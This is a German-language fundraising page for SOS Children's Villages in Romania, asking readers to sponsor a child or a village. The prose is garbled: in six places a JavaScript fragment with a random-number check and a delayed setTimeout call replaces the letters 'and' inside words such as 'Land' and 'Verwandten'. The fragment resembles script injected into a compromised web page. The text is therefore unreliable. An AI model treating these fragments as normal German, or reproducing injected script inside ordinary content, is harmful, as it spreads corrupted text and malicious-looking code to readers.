Werden Sie Pate und schenken Sie Kindern in Rumänien Hoffnung

Etwa 21,9 Millionen Menschen leben Schätzungen zufolge in Rumänien, das seit 2007 Vollmitglied der Europäischen Union ist. Eine wechselvolle Geschichte bestimmte das Leben der Menschen in diesem Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and. Auch heute noch – fast 25 Jahre nach dem Sturz des kommunistischen Regimes – kämpfen die Menschen mit sozialen und wirtschaftlichen Problemen. Um Arbeit zu finden, verlassen viele junge Menschen die ländlichen Regionen, während die Älteren bleiben und auf sich allein gestellt sind. Jeder zweite auf dem Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and lebt unterhalb der Armutsgrenze. Auch zwingt die schwierige Lage viele rumänische Eltern dazu, im Auslandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and nach Arbeit zu suchen, während ihre Kinder oft nur notdürftig bei Verwandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andten untergebracht sind.

In die Schlagzeilen kam das Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and auch, als die unzumutbaren Bedingungen in Waisenhäusern und Kinderheimen Rumäniens aufgedeckt wurden. Das Schicksal der Kinder, die unter Unterernährung, schlechter medizinischer Versorgung und einem Leben unter grauenhaften Bedingungen litten, ließen die Welt aufhorchen. Die Zustände vor Ort haben sich inzwischen verbessert, auch wenn es nach wie vor an vielem mangelt, das elternlose Mädchen und Jungen für ein gesundes Aufwachsen benötigen.

Hilfe für notleidende Kinder in Rumänien

Ein Lichtblick für Kinder und Jugendlichen sind die drei SOS-Kinderdörfer, die seit 1989 in dem osteuropäischen Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and gebaut werden konnten. Straßenkinder, Sozialwaisen und elternlose Kinder Rumäniens bekommen durch unser unabhängiges und überkonfessionelles Kinderhilfswerk wieder eine Chance auf ein glückliches Leben. Sie wachsen bei einer SOS-Kinderdorfmutter in einer großen Familie wohlbehütet auf und werden umfassend versorgt.

Eine Patenschaft schenkt Hoffnung auf ein besseres Leben

  • Dank zahlreicher Spenden und der Unterstützung von Paten ist die Arbeit der rumänischen SOS-Kinderdörfer seit 24 Jahren möglich. Wenn auch Sie sich für notleidende Kinder in Rumänien engagieren möchten, unterstützen Sie uns:
  • Mit einer SOS-Kindpatenschaft in Höhe von monatlich 31 Euro tragen Sie dazu bei, dass ein rumänisches Kind Zuwendung, Nahrung, Kleidung und Schulbildung erhält. Außerdem sichern Sie seine medizinische Versorgung.
  • Helfen können Sie auch mit einer SOS-Kinderdorfpatenschaft. Mit ihrem monatlichen Beitrag von 26 Euro unterstützen Sie ein ganzes Kinderdorf und sichern dabei auch, dass bedürftige Kinder aus der Nachbarschaft Zugang zu den SOS-Kindergärten und verschiedenen Hilfsprogrammen haben.

Helfen Sie mit und geben Sie Kindern durch Ihre Spende oder Patenschaft Hoffnung und ein Leben in Geborgenheit.